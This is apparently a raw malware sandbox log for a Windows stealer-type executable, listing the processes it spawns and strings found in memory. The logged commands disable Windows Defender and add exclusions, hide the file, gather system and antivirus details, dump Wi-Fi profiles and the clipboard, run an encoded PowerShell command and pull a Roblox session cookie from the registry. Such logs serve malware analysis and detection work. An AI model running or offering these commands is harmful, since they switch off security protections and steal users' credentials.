              Source: KpHYfxnJs6.exeBinary or memory string: OriginalFilenameverifiergui.exej% vs KpHYfxnJs6.exe
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: KpHYfxnJs6.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: Commandline size = 3647
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: Commandline size = 3647
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 3615
              Source: KpHYfxnJs6.exeStatic PE information: Section: ZLIB complexity 0.9997178819444444
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9979877861815208
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9909470942982456
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992167078976848
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9968581058808017
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9947857908393501
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@206/55@4/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3CAFC GetLastError,FormatMessageW,109_2_00007FF6FAA3CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA3EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,109_2_00007FF6FAA3EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA6B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,109_2_00007FF6FAA6B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeCode function: 109_2_00007FF6FAA43144 GetDiskFreeSpaceExW,109_2_00007FF6FAA43144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2380:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeMutant created: \Sessions\1\BaseNamedObjects\i
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1464:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:792:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3612:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6188:120:WilError_03
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73202
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: KpHYfxnJs6.exe, 00000004.00000003.2743545312.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: KpHYfxnJs6.exe, 00000004.00000002.2898061015.000000006C181000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: KpHYfxnJs6.exeVirustotal: Detection: 43%
              Source: KpHYfxnJs6.exeReversingLabs: Detection: 42%
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile read: C:\Users\user\Desktop\KpHYfxnJs6.exe
              Source: unknownProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\getmac.exe getmac
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
